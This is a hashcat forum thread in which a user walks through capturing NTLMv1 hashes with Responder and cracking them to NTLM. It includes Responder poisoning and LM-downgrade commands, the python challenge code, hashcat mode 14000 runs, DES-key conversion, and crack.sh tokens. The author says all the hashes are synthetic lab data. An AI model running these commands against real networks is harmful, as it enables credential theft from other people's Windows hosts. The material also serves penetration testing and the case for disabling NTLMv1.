NTLMv1 to NTLM Reversing

[evilmog]

So I made life easy for the mode 14000 reversing NTLMv1 to NTLM both with and without SSP, I am adding this writeup on hashcat to save people time while searching for it. The original credit goes to atom for developing mode 14000 and his original writeups.

** All hashes in this writeup are synthetic and exist only in a lab machine, they are used for illustration purposes are in no way should you ever post hashes on the hashcat forums. I warrant that these did not come from a live production system or one where any kind of client or customer data every existed.

First of all the link to the tool:
https://github.com/evilmog/ntlmv1-multi

Step 1, obtain a hash:
Without SSP if LM is enabled

Code:

responder -I eth0 --lm -wrfFP

Code:

[SMB] NTLMv1 Client  : 184.64.60.62
[SMB] NTLMv1 Username : DUSTIN-5AA37877\hashcat
[SMB] NTLMv1 Hash    : hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

The hash portion looks like this:

Code:

hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

Now if LM is disabled but NTLMv1 is still enabled as per https://docs.microsoft.com/en-us/windows...tion-level at a level of 2 then we have to contend with SSP:

Code:

responder -I eth0 -wrfFP

The output looks like this:

Code:

[SMB] NTLMv1-SSP Client  : 184.64.60.62
[SMB] NTLMv1-SSP Username : DUSTIN-5AA37877\hashcat
[SMB] NTLMv1-SSP Hash    : hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788

the SSP hash will look like this:

Code:

hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788

The important thing to notice is all the 0000000's in the lm portion of the hash.

NTLMv1 looks like this
username:blank:realmname/domainname:lm:nt:challenge

The important part about SSP due to a lack of LM is that the Client challenge gets changed to an SRV Challenge....the python code for the srvchallenge looks like this:

Code:

if lmresp[20:48] == "0000000000000000000000000000":
  print("Hash response is ESS, consider using responder with --lm")
  clientchallenge = hashsplit[5]
  combinedchallenge = clientchallenge + lmresp[0:16]
  m = hashlib.md5()
  m.update(binascii.unhexlify(combinedchallenge))
  md5hash = m.hexdigest()
  srvchallenge = md5hash[0:16]
  ct1 = ntresp[0:16]
  ct2 = ntresp[16:32]

Step 2) we take our hash and we feed it to the NTLMv1 multi tool

Code:

python ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"
Hash response is ESS, consider using responder with --lm
Hashfield Split:
['hashcat', '', 'DUSTIN-5AA37877', '85D5BC2CE95161CD00000000000000000000000000000000', '892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
LM Response: 85D5BC2CE95161CD00000000000000000000000000000000
NT Response: 892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0
Client Challenge: 1122334455667788
SRV Challenge: b36d2b9a8607ea77

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000

To crack with hashcat create a file with the following contents:
892F905962F76D32:b36d2b9a8607ea77
3837F613F88DE27C:b36d2b9a8607ea77

echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash
echo "3837F613F88DE27C:b36d2b9a8607ea77">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
$NETLM$b36d2b9a8607ea77$892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0

Step 3) we create 14000.hash, thankfully the tool outputs the command to do this:

Code:

echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash
echo "3837F613F88DE27C:b36d2b9a8607ea77">>14000.hash

Step 4) crack with hashcat, that being said I already know the output, this will take about 3 days on 32 GTX 1080's ish or so, so in order to verify I have nothing up my sleeve there is a tool in the repo that converts NTLM keys to DES keys

Code:

python ntlm-to-des.py  --ntlm 8846f7eaee8fb117ad06bdd830b7586c
DESKEY1: b55d6d05e6792652
DESKEY2: bdba82e6895a9d6a

echo b55d6d05e6792652>>des.cand
echo bdba82e6895a9d6a>>des.cand

We now run the echo commands it spit out, as well as the commands for the 14000.hash creation and actually crack with hashcat:

Code:

evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo '$HEX[8923bdfdaf753f63]'>>des.cand
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo '$HEX[17d741d7ddc1c36f]'>>des.cand
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo "3837F613F88DE27C:b36d2b9a8607ea77">>14000.hash
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat/hashcat/hashcat -d 3 -m 14000 -a 0 14000.hash des.cand

...truncated...
892f905962f76d32:b36d2b9a8607ea77:$HEX[8923bdfdaf753f63]
3837f613f88de27c:b36d2b9a8607ea77:$HEX[17d741d7ddc1c36f]
...truncated...

step 5) convert the des keys to ntlm

Code:

evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat-utils/src/deskey_to_ntlm.pl 8923bdfdaf753f63
8846f7eaee8fb1

evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat-utils/src/deskey_to_ntlm.pl 17d741d7ddc1c36f
17ad06bdd830b7

step 6) calculate ct3

Code:

~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000

586c

alternatively you can swap out 1122334455667788 for the newly calculated SRV Challenge

Code:

~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 b36d2b9a8607ea77

586c

step 7) stitch them together:
8846f7eaee8fb1 17ad06bdd830b7 586c

step 8) verification to prove this all works:

Code:

echo -n password | iconv -f utf8 -t utf16le | openssl dgst -md4

(stdin)= 8846f7eaee8fb117ad06bdd830b7586c

~/git/hashcat/hashcat/hashcat -m 5500 -d 3 ntlmv1.txt cand
...truncated...
hashcat::DUSTIN-5AA37877:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595:1122334455667788:password

hashcat::DUSTIN-5AA37877:85d5bc2ce95161cd00000000000000000000000000000000:892f905962f76d323837f613f88de27c2bbd6c9abcd021d0:1122334455667788:password

Step 9) be lazy and use the crack.sh tokens provided and pay $ to crack or use the 1122334455667788 challenge if you can get a solid LM

[hasherdasher]

You are my hero..  Thank you for this..

[evilmog]

Btw I realized there was an error in my DES KEY generation part of the post, the corrected execution is here:

Code:

evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ python ntlm-to-des.py  --ntlm 8846f7eaee8fb117ad06bdd830b7586c
DESKEY1: 8923bdfdaf753f63
DESKEY2: 17d741d7ddc1c36f

echo '$HEX[8923bdfdaf753f63]'>>des.cand
echo '$HEX[17d741d7ddc1c36f]'>>des.cand

[DanielG]

Also check out https://crack.sh/netntlm/, they crack NTLMv1 to NTLM for free fast if you set responder to the static challenge of 1122334455667788

[evilmog]

Also check out https://crack.sh/netntlm/, they crack NTLMv1 to NTLM for free fast if you set responder to the static challenge of 1122334455667788

Yep and they reference my multi tool as listed in this post:

https://crack.sh/cracking-ntlmv1-w-ess-ssp/

Also my tool outputs crack.sh tokens

[m1ck3yb33]

what happens if responder gives me a hash like this?

what the examples show:
username::hostname:response:response:challenge


what my hash looks like:
username::hostname:challenge:response:response